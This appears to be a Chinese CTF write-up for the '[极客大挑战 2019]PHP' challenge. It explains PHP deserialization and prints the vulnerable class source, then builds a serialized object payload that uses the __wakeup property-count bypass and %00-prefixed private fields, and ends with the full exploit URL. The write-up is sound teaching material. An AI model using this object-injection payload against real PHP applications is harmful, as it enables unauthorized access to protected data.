zoukankan      html  css  js  c++  java
  • [极客大挑战 2019]PHP CTF题解与分析

    知识点

    • php序列化与反序列化
      序列化:函数为serialize(),把复杂的数据类型压缩到一个字符串中 数据类型可以是数组,字符串,对象等
      反序列化:函数为unserialize(),将字符串转换成变量或对象的过程
      常用的魔术方法:
      __construct():创建对象时初始化,当一个对象创建时被调用
      __wakeup() 使用unserialize时触发
      __sleep() 使用serialize时触发
      __destruction():结束时销毁对象,当一个对象销毁时被调用

    • private
      private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上的前缀。字符串长度也包括所加前缀的长度

    • __wakeup()绕过
      在反序列化字符串时,属性个数的值大于实际属性个数时,会跳过 __wakeup()函数的执行

    解题思路与过程

    1.目录扫描
    访问题目连接根据提示猜测可能存在信息泄露,我们扫描目录发现备份文件:www.zip,发现备份文件为源代码


    2.代码审计
    在index.php中找到php代码

    <?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>
    

    这里包含了class.php文件,用GET方法传入参数select的值,然后反序列化该值,猜测此题与反序列化漏洞有关
    接着审class.php

    <?php
    include 'flag.php';
    
    
    error_reporting(0);
    
    
    class Name{
        private $username = 'nonono';
        private $password = 'yesyes';
    
        public function __construct($username,$password){
            $this->username = $username;
            $this->password = $password;
        }
    
        function __wakeup(){
            $this->username = 'guest';
        }
    
        function __destruct(){
            if ($this->password != 100) {
                echo "</br>NO!!!hacker!!!</br>";
                echo "You name is: ";
                echo $this->username;echo "</br>";
                echo "You password is: ";
                echo $this->password;echo "</br>";
                die();
            }
            if ($this->username === 'admin') {
                global $flag;
                echo $flag;
            }else{
                echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
                die();
    
                
            }
        }
    }
    ?>
    

    如果password=100,username=admin,在调用__destruct()时就可以获得flag,因此我们需要构造一个序列化使得password=100,username=admin

    <?php
    class Name{
        private $username = 'nonono';
        private $password = 'yesyes';
    
        public function __construct($username,$password){
            $this->username = $username;
            $this->password = $password;
        }
    }
    $a = new Name('admin', 100);
    $b = serialize($a);
    echo $b;
    ?>
    

    得到序列化后的结合

    O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
    

    3.绕过__wakeup()

    __wakeup()方法中$this->username = 'guest'会让username重新赋值。在反序列化字符串时,属性个数的值大于实际属性个数时,会跳过 __wakeup()函数的执行,我们可以将字符串中O:4:"Name"后面的2改为3及以上的整数

    O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
    

    注意该类中使用的private来声明字段,private在序列化中类名和字段名前都要加上ASCII 码为 0 的字符(不可见字符),如果我们直接复制结果,该空白字符会丢失,需要我们自己加上

    O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
    

    将该字符串作为select参数的值,GET方式发送过去就可以获得flag

    http://题目链接/?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}
    
  • 相关阅读:
    meta属性
    博客
    概念术语
    装饰器与生成器
    Linux基础
    线程
    网络编程之socket
    网络编程之网络基础部分

    内置函数(max,min,zip)及文件处理
  • 原文地址:https://www.cnblogs.com/g0udan/p/12327150.html
Copyright © 2011-2022 走看看